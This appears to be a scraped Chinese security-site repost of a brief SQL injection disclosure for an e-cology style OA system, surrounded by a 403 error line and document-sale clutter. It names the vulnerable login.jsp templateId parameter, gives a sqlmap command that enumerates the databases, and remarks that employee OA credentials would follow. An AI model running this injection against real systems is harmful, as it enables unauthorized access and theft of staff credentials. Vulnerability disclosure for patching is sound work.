403 Forbidden
Request forbidden by administrative rules.魔方某系统SQL注入漏洞
魔方某系统漏洞oa系统使用了通用的程序，存在漏洞，具体的漏洞URL:
/wui/theme/ecology7/page/login.jsp?templateId=1
使用SQLmap进行注入：
python sqlmap.py -u &/wui/theme/ecology7/page/login.jsp?templateId=1& --dbs --dbms &Oracle&
如图,可以获取所有的数据库表：
就不继续深入了，所有员工的oa帐号密码肯定手到擒来！
修复方案：
通用使用，使用需谨慎，可以考虑放到内网，毕竟OA系统属于比较重要的系统。
最主要还是漏洞，可以参考他们官方的补丁吧，升级系统！
【声明】:黑吧安全网()登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱，我们会在最短的时间内进行处理。
上一篇：【】【】e-cology二次开发培训文档_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
e-cology二次开发培训文档
阅读已结束，下载文档到电脑
想免费下载更多文档？
定制HR最喜欢的简历
下载文档到电脑，方便使用
还剩4页未读，继续阅读
定制HR最喜欢的简历
你可能喜欢}